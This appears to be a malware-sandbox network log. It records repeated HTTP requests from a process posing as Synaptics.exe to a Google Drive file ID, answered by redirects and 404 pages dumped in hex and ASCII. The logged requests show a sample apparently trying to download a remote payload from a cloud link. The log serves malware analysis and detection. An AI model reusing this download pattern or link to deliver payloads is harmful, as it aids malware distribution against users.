                                                                                                                                                      2024-12-30 10:25:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EmuqORgLzIEXkRccdf4tlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      7192.168.2.1149788172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-z1RGsgZOBfVRPymUrHBBTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      8192.168.2.1149789142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:31 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:32 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5-FOXmNKMuQEefk0lV_xggA8s9UjUUHEo_C9hOJS_9396nxRl9GegUTMP-jElXBcPc
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HC3X_SlqlQs-glgBXh25Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:32 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 45 58 50 4f 30 55 55 6a 35 56 79 31 44 6f 46 6a 31 51 44 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fEXPO0UUj5Vy1DoFj1QDdw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:32 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      9192.168.2.1149790142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:31 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:32 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6wFw-YHUbq0Ewck829n3g8QC_MvvBjv4Sq0MYzpytkfBfedxnu7iSt4vGiAvYKhito
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aGM57mpJXpkSbjuhrfRPHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT; expires=Tue, 01-Jul-2025 10:25:32 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:32 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 31 2d 74 30 78 50 67 41 65 5f 52 6c 67 65 54 66 70 78 6e 6c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="51-t0xPgAe_RlgeTfpxnlg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:32 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      10192.168.2.1149799172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:32 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zJTYWg5ChWbDZR_fuBom3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      11192.168.2.1149801142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5aEUTcnEip1TUte8B_tHQA0KCILInPpzVd_1xK7cgwoXsSLKf-hOpyichF4Pj20TlY8pNWTkg
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ocyzaAViPKhFnLXPxEOjnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 2d 68 37 50 62 4d 43 34 53 5a 43 6d 57 75 68 30 59 6e 41 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="W-h7PbMC4SZCmWuh0YnAAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      12192.168.2.1149802172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:32 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sNFoq5j1ZY-f7jHznqdJmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      13192.168.2.1149807142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
                                                                                                                                                      2024-12-30 10:25:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6n9RrkdfXLy-3tZCG04DKjEUv5EEk-7_VYA9oMVMZ8ybZSgUHfTAErIaRUzrJoLDL1AsduCnI
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-UECtAfVREZOMr9Xn0W_v0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
